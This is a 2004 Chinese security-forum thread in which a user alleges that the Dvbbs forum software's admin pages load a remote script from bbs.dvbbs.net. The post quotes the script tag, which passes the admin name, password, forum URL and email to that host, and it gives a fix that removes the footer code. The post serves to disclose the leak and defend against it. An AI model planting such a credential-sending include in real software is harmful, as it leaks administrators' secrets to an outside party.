|
作者: guzhu [guzhu] 论坛用户 | 登录 |
“免费”得到动网商业版的朋友可要注意啦!!动网论坛的后台管理程序,每一个页面都会调用一个来自bbs.dvbbs.net的脚本程序。而该脚本程序其实是一个ASP程序。你的动网论坛会把包括你的论坛地址、论坛名称、后台密码等9项信息传递给那个ASP程序。动网收集到这些信息,要是想找出谁在用翻版或者到你的论坛捣乱真是易如反掌! 如何证实你的论坛有没有出卖你: 进入后台管理程序,查看在右边框架的代码,你会发现如下片断 <script src="http://bbs.dvbbs.net/packjs.asp?a=[管理员]&b=[密码]&c=[论坛名称]&d=[论坛网址]&e=[未知意义的数字]&f=[未知意义的数字]&g=[你的邮箱地址]&h=[未知意义的数字]&i=[论坛版本]"></script> 呵呵,,看到吧,你的资料多详细!动网收集私隐的手段竟如此明目张胆!! 解决办法: 编辑DvADChar.asp,把过程footer()的代码去掉。就是这样: Sub footer() End Sub |
地主 发表时间: 04-09-11 16:49 |
回复: hackerjune [hackerjune] 论坛用户 | 登录 |
你能详细的解释下吗?我有点不懂也 我对漏洞了解好少的` |
B1层 发表时间: 04-09-11 17:00 |
回复: guzhu [guzhu] 论坛用户 | 登录 |
在该文件的源文件里面呀! |
B2层 发表时间: 04-09-11 19:21 |
回复: hackerjune [hackerjune] 论坛用户 | 登录 |
哦````````` |
B3层 发表时间: 04-09-11 19:28 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号